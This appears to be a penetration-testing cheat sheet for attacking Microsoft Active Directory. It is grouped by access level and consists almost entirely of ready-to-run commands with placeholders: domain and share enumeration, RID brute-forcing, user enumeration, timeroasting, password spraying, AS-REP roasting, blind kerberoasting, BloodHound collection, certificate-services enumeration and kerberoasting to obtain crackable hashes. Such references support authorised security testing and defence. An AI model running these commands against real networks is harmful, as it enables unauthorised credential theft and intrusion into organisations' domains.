Active Directory Methodology

No credentials

Enumeration

nxc smb <target_ip>
enum4linux -a <target_ip>
nmap -n -sV --script "ldap* and not brute" -p 389 <dc_ip>
ldapsearch -x -H <dc_ip> -s base

Zone transfer

dig axfr <domain> @<dc_ip>

nxc smb <dc_ip> -u '' -p '' --shares
nxc smb <dc_ip> -u 'guest' -p '' --shares

Enumerate users

nxc smb <dc_ip> --users
nxc smb <dc_ip> --rid-brute 10000

kerbrute userenum -d <domain> <user_wordlist>

Timeroast

timeroast.py <dc_ip>

Valid user (no password)

Password spray

nxc smb <dc_ip> -u <user_wordlist> -p <password_wordlist> --no-bruteforce --continue-on-success

ASREP Roast

nxc ldap <dc_ip> -u <user_wordlist> -p '' --asreproast <output>

GetNPUsers.py <domain>/ -usersfile <user_wordlist>

Blind kerberoast

GetUserSPNs.py -no-preauth <asrep_user> -usersfile <user_wordlist> -dc-host <dc_ip> <domain>/

Valid credentials

List all users

nxc smb <dc_ip> -u <user> -p <password> --users

Enumerate SMB shares

nxc smb <dc_ip> -u <user> -p <password> -M spider_plus

smbclient.py <user>:<password>@<dc_ip>

BloodHound

bloodhound-ce-python -d <domain> -u <user> -p <password> [-ns <dc_ip>] -c All --zip

Enumerate LDAP

ldapdomaindump.py -u <domain>\<user> -p <password> -o <output_folder> <dc_ip>

Enumerate ADCS

certipy find -u <user>@<domain> -p <password> -dc-ip <dc_ip> -stdout

Kerberoast

nxc ldap <dc_ip> -u <user> -p <password> --kerberoasting $OUTPUT_FILE

GetUserSPNs.py -request -dc-ip <dc_ip> <domain>/<user>:$PASSWORD

If you find this error from Linux: KRB_AP_ERR_SKEW(Clock skew too great) it's because of your local time, you need to synchronise the host with the DC.

sudo ntpdate <dc_ip>

hashtagNo credentials

hashtagEnumeration

hashtagZone transfer

hashtagShares

hashtagEnumerate users

hashtagTimeroast

hashtagValid user (no password)

hashtagPassword spray

hashtagASREP Roast

hashtagBlind kerberoast

hashtagValid credentials

hashtagList all users

hashtagEnumerate SMB shares

hashtagBloodHound

hashtagEnumerate LDAP

hashtagEnumerate ADCS

hashtagKerberoast

No credentials

Enumeration

Zone transfer

Shares

Enumerate users

Timeroast

Valid user (no password)

Password spray

ASREP Roast

Blind kerberoast

Valid credentials

List all users

Enumerate SMB shares

BloodHound

Enumerate LDAP

Enumerate ADCS

Kerberoast